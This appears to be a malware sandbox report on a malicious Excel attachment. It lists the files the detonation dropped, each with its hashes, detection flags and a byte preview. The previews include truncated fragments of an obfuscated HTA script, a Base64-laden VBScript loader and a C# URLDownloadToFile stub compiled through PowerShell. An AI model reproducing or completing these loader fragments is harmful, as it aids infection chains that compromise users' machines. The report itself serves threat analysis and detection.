                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbookupdateion[1].hta

                                                              Download File
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):118476
                                                              Entropy (8bit):2.5470045316246623
                                                              Encrypted:false
                                                              SSDEEP:96:Ea+M7QSdcKQc+Zp7Itsf9uIKUcDCc+D5tfCc/AT:Ea+QRaQ5T
                                                              MD5:5144E4B60C5A3831B980F834050AC4FE
                                                              SHA1:DDAA3FC5EC7E7AAF93FC0BB7749D9C6FDEA2D499
                                                              SHA-256:41E8A02837AAAC07591484D4BD29E3B37F243CF4044A43D0A6DAE60571829CA8
                                                              SHA-512:4F72E1FA0DC576254D9238B495E642730032AAB17851D98DEF2D5CCEBE7044CDEF2C214F5B64CE8D5812B7840B06BDF49102B6B491BC5D67653C6BA73BE3B648
                                                              Malicious:true
                                                              Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCRIpT%252520TyPE%25253D%252522TeXt/vBSCrIpt%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IEnetbookupdation[1].vbs

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with very long lines (65478), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1622552
                                                              Entropy (8bit):5.859532843834189
                                                              Encrypted:false
                                                              SSDEEP:24576:Mc0RUB3zTeUAhbzvvvJc0RUB3zTeUAhbzvvvz:McRPoJcRPoz
                                                              MD5:53512A7D960A5CC729101E63B7BC304D
                                                              SHA1:A22065BB3B20F561535A6482B8AEC353B094A2B8
                                                              SHA-256:E9E5A2BAF0C323EFC420EA80B8D08A75B99CCFFA4CE3B6C67E605F27FD0013B9
                                                              SHA-512:1F7D29E117454821873660006B947BF88D142C1675DE8544B76423D5E2397369F8BC7541F1994E033A13369034C66511CCA5C60FB59FC08C762EE3E9C2760C55
                                                              Malicious:false
                                                              Preview:' Main script logic for processing Base64-encoded data....' Define the Base64-encoded string (use actual data in place of "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@ZIYD@@Fda+mY@@@@@@@@@@@@@@@@@@@@P@@@@Lg@@L@@j@@@@@@IgG@@@@...o...w@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@E@@@@@@@@@@@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@D@@...w@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@I@@@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Dg...gDI3g@@@@@@@@@@@@@@@@@@@@@@@@...IvQc@@SFE@@@@@@@@@@@@@@@@@@@@@@@@@@HFYG@@...w@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ACC71F0.emf

                                                              Download File
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                              Category:dropped
                                                              Size (bytes):5596528
                                                              Entropy (8bit):2.9627880151323387
                                                              Encrypted:false
                                                              SSDEEP:12288:Nft3bECFzKzjLBMc0GtIRabD8R1AZJBa5jB7gOaOGVIl00xh600msetQr00ujh60:N5ACi8BiJK+nIlDh6osetQrsjh60
                                                              MD5:C8FF65340D86E7546ED74F2AEA89FF70
                                                              SHA1:C3C02AC92015D94D4D68479DADB5CD110C6CF8C9
                                                              SHA-256:58B91D40032E4C9C693DDACBA27C24C875EBBF2F9F6C9FFA7A10991FC1049C4C
                                                              SHA-512:385060117D6AE29EAC9CD9B6F69E50DF6FD86A84095AA2FA4DC14F2F3AAA27E2A6FC8E6F0E03F4D53E3A5A1038EF639B53BD44188E943A830005176F201D5008
                                                              Malicious:false
                                                              Preview:....l...............;............H...@.. EMF....peU.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...

                                                              C:\Users\user\AppData\Local\Temp\RESB8B5.tmp

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:26:28 2024, 1st section name ".debug$S"
                                                              Category:dropped
                                                              Size (bytes):1328
                                                              Entropy (8bit):3.9936485630985605
                                                              Encrypted:false
                                                              SSDEEP:24:HMe9EurokzdHiwKdNWI+ycuZhNqakSiPNnqSqd:pr3hZKd41ulqa3uqSK
                                                              MD5:BF5E93AD676C6DF06158E49B23555ECD
                                                              SHA1:CB2B23F250DA39FA2328262D297A9A6F141E3D77
                                                              SHA-256:FCB68F084ACF1C50E7C70F86AAD0C56BDDA504213F50DAADD7CAA7DA98EBB418
                                                              SHA-512:F8946C52162119E32BA7BDB8E67D95427A0ED0C6DFC02C85881AAE299B14D96FD81A7AF108A288A22B96096BFB1452299204FFFD6D3A7C1C511970DA4CA7C21F
                                                              Malicious:false
                                                              Preview:L....`.f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP..................^-.>.4..emS...........4.......C:\Users\user\AppData\Local\Temp\RESB8B5.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.o.2.4.x.f.v.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                              C:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                              File Type:MSVC .res
                                                              Category:dropped
                                                              Size (bytes):652
                                                              Entropy (8bit):3.1066939174672883
                                                              Encrypted:false
                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grydCak7YnqqsDPN5Dlq5J:+RI+ycuZhNqakSiPNnqX
                                                              MD5:D7E75E2DED873EA134E81C656D53E38C
                                                              SHA1:935A0C43B2D83FF3C990976149CD70B0FDD33DEE
                                                              SHA-256:8B0A006080FDF8430F9C2D04C7509E0C81AB6152EA42A43D915F5C0A9AE8AABA
                                                              SHA-512:C8675E603F81B890638A6AFDC9A5017A5E9947167109F6210893BB2F8F626F53666555139B9A4556BB30675A285D8DF84E9F6693F8CD6ED512E4E1F23B2A5342
                                                              Malicious:false
                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.o.2.4.x.f.v.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.o.2.4.x.f.v.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                              C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.0.cs

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (358)
                                                              Category:dropped
                                                              Size (bytes):481
                                                              Entropy (8bit):3.835940158741224
                                                              Encrypted:false
                                                              SSDEEP:6:V/DsYLDS81zu5O0IddMGpJ/nQXReKJ8SRHy4Huovm8OLmeh/2Iy:V/DTLDfu+SXfHZOLRh+Iy
                                                              MD5:8E7BE84B6D73B0125DA898BF4FE40A8B
                                                              SHA1:0C09415A7F4B9BB4C4B9A7EA95D7079E28C12132
                                                              SHA-256:76F406E082EAD6D4396D40EDB1347F631F731BF7F1912128F6BFFC131EB7D350
                                                              SHA-512:C27BC6FECC34A110FA5F8AA182B24F9FE497548226FAFF73C120FA2B94C84D99E9DF62D4462C08726347D2100E90BA6969468FD5E52A1A3DD7C00C963AF8835B
                                                              Malicious:false
                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace FJMwHxeGH.{. public class yrZmcxwOXn. {. [DllImport("urlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr YjsOqpL,string gJrUwi,string Xq,uint svKpjWlPY,IntPtr PFjPz);.. }..}.

                                                              C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):369
                                                              Entropy (8bit):5.278771478068731
                                                              Encrypted:false
                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f3Bknzxs7+AEszIP23f3Bkin:p37Lvkmb6KzZknWZEoZki
                                                              MD5:44612028F23695DCBD6AC49BD1C78777
                                                              SHA1:29C32A6C7C419F8668DF0B79CFA8846555041D38
                                                              SHA-256:9D94F940BD70B4EE5E2B03B8DA51E1E673C2F65313E12DB206E4C431DDB112F8
                                                              SHA-512:BD175A449EC483DF2A73DC1CFA2B8C562EB61D7693CC44D9CD847FAAF45992ABE35DC25A5515B8F41FEFA8CD90791FD628493D14C21F290BDC6E6D42629640ED
                                                              Malicious:true
                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.0.cs"

                                                              C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll

                                                              Download File
                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3072
                                                              Entropy (8bit):2.857016319360451
                                                              Encrypted:false
                                                              SSDEEP:24:etGSOPBG5eAdF8c/kSyffki0RtkZfYT98UMEWI+ycuZhNqakSiPNnq:6FsAdeoy0i0cJYT9bMn1ulqa3uq
                                                              MD5:F1E4ED729C6C5EF5659295E909EBCD6B
                                                              SHA1:2D9FE08F4A6463D9C57FFD244005BC0710FE5C10
                                                              SHA-256:74E7243146ADC40F7EAF0D3CF1E6F699236114A1C5FB475E36AD5108AAAF24F6
                                                              SHA-512:AF5D49AED0C589ED14EF89B923278D74947E0CB40141DFA50E8624205D6EF8625CE59DC6C2525AEC8C9706EA7D3A0AEB17AC70FE5BCE3DBC9031D9CA313D44D6
                                                              Malicious:true
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`.f...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................<.5.....}.....}...........................".............. C.....P ......U.........[.....c.....j.....m.....w...U.....U...!.U.....U.......!.....*.......C.......................................,..........<Module>.ao

                                                              C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.out

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                              Category:modified
                                                              Size (bytes):866
                                                              Entropy (8bit):5.345750183187077
                                                              Encrypted:false
                                                              SSDEEP:24:AId3ka6KzaUEoabKaMD5DqBVKVrdFAMBJTH:Akka60ZEogKdDcVKdBJj
                                                              MD5:11DA92FD90C813DEDD2FE8B6108BE087
                                                              SHA1:A8B7C6B0AC4179A30BE0A8D7505934836662CFB0
                                                              SHA-256:E26164140A95A6032606104F95DA9F688B0D2586288C990D6B0202A0609AB2C9
                                                              SHA-512:9A6EBEB0DAB9A27BED269CBE300A4B2BC80D9A0DC835A64B7A53063911BE6716840E7C8EA3A2E1DFC4AFFFEA3EB20569F3FBDD339208B7E51503D17057B7DADC
                                                              Malicious:false
                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                              C:\Users\user\AppData\Local\Temp\fji3hte3.a5m.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview:1

                                                              C:\Users\user\AppData\Local\Temp\s4hj22iq.ipe.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview:1

                                                              C:\Users\user\AppData\Local\Temp\temp_exec.exe

                                                              Download File
                                                              Process:C:\Windows\System32\wscript.exe
                                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):528016
                                                              Entropy (8bit):7.957273576746712
                                                              Encrypted:false
                                                              SSDEEP:12288:DWdajkC2ljdp3HRKppjOKTtxwLxh4njvjPms1R7:DWdajWljPRKp5OWIhCjvjPmsX7
                                                              MD5:77733FB5B16FC7AE0944C92FD2E89D7E
                                                              SHA1:9BA5582FC3A6570BE7872F05E13DCE27C5C7B741
                                                              SHA-256:95E1A03325DDA8B3FC31E2DD4BBFA55789115AE87E948AB4DD596BF14F5FF243
                                                              SHA-512:0E8C7A45A70508E9DC457227968FC58078FF821FB5CD85D7D42FEE766BB55B762F0FE89709A803D9A17868EFA861B225049F6DB312549907124F47160AF84D39
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...WZ.f..............0......h........... ....@...... ....................................`...@......@............... ..............................................H...HQ...........V............................................................... ..H............text...`.... ...................... ..`.reloc..............................@..B.rsrc...............................@..@<.......H........V..hP...........E..x...........................................".(.....*....0..|.........(....%&(......(....%&..(....%&. E...(....%&. b...(......(......(....%&...(....%&%....%.~?....%...%.................(.....*.0............ s...(....%& x...(....%&(}...%& {...(.... ....(....%&(}...%& ....(....%& ....(....%&(}... ....(....%& ....(....(}...%& ....(.... ....(....%&(}...%&.+..*...0.............+..*..0............(....%&.+..*...0..F........ ....(....%&. ....(....%&... ..

                                                              C:\Users\user\AppData\Local\Temp\~DF096F86C2DF7A876A.TMP

                                                              Download File
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\~DFF1E1590C893D8C32.TMP

                                                              Download File
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):512
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                              Malicious:false
                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\Enetbookupdation.vbs

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with very long lines (65478), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1622552
                                                              Entropy (8bit):5.859532843834189
                                                              Encrypted:false
                                                              SSDEEP:24576:Mc0RUB3zTeUAhbzvvvJc0RUB3zTeUAhbzvvvz:McRPoJcRPoz
                                                              MD5:53512A7D960A5CC729101E63B7BC304D
                                                              SHA1:A22065BB3B20F561535A6482B8AEC353B094A2B8
                                                              SHA-256:E9E5A2BAF0C323EFC420EA80B8D08A75B99CCFFA4CE3B6C67E605F27FD0013B9
                                                              SHA-512:1F7D29E117454821873660006B947BF88D142C1675DE8544B76423D5E2397369F8BC7541F1994E033A13369034C66511CCA5C60FB59FC08C762EE3E9C2760C55
                                                              Malicious:true
                                                              Preview:' Main script logic for processing Base64-encoded data....' Define the Base64-encoded string (use actual data in place of "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@ZIYD@@Fda+mY@@@@@@@@@@@@@@@@@@@@P@@@@Lg@@L@@j@@@@@@IgG@@@@...o...w@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@E@@@@@@@@@@@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@D@@...w@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@I@@@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Dg...gDI3g@@@@@@@@@@@@@@@@@@@@@@@@...IvQc@@SFE@@@@@@@@@@@@@@@@@@@@@@@@@@HFYG@@...w@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

                                                              C:\Users\user\Desktop\F7A30000

                                                              Download File
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:26:33 2024, Security: 1
                                                              Category:dropped
                                                              Size (bytes):647168
                                                              Entropy (8bit):7.982632785360645
                                                              Encrypted:false
                                                              SSDEEP:12288:TgGoCXeuce17u7ozDxbvk6n3SwpnPUDt4ovcMXaTNAnGG2nh0R:Tx7evemozDxbc63Sw5UDj5KTNAGxn
                                                              MD5:5036DF6BAAA88149B6C575451BE7F0EE
                                                              SHA1:F502BFDBD8A27DE2AD5C06FB090A01D42E51B635
                                                              SHA-256:F9D22B22A31BBB7535E00A883FFFFAE8DB8368D634110122D7719CE0CE9098FD
                                                              SHA-512:CDFACF403AA1EE99CBEFF5EE93EE15A94B470ABB2AAC4A45050C565A14298B26C712A6616C5FB0B84870A34035B6623A98903C9A31B793BE4BB99CA1EA095360
                                                              Malicious:false
                                                              Preview:......................>...................................9...................|.......~...............b.......d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...........;.......=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                              C:\Users\user\Desktop\F7A30000:Zone.Identifier

                                                              Download File
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:false
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              C:\Users\user\Desktop\PI#0034250924.xla.xls (copy)

                                                              Download File
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:26:33 2024, Security: 1
                                                              Category:dropped
                                                              Size (bytes):647168
                                                              Entropy (8bit):7.982632785360645
                                                              Encrypted:false
                                                              SSDEEP:12288:TgGoCXeuce17u7ozDxbvk6n3SwpnPUDt4ovcMXaTNAnGG2nh0R:Tx7evemozDxbc63Sw5UDj5KTNAGxn
                                                              MD5:5036DF6BAAA88149B6C575451BE7F0EE
                                                              SHA1:F502BFDBD8A27DE2AD5C06FB090A01D42E51B635
                                                              SHA-256:F9D22B22A31BBB7535E00A883FFFFAE8DB8368D634110122D7719CE0CE9098FD
                                                              SHA-512:CDFACF403AA1EE99CBEFF5EE93EE15A94B470ABB2AAC4A45050C565A14298B26C712A6616C5FB0B84870A34035B6623A98903C9A31B793BE4BB99CA1EA095360
                                                              Malicious:false
                                                              Preview:......................>...................................9...................|.......~...............b.......d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...........;.......=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                              C:\Users\user\Desktop\~$PI#0034250924.xla.xlsx

                                                              Download File
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):165
                                                              Entropy (8bit):1.4377382811115937
                                                              Encrypted:false
                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                              Malicious:true
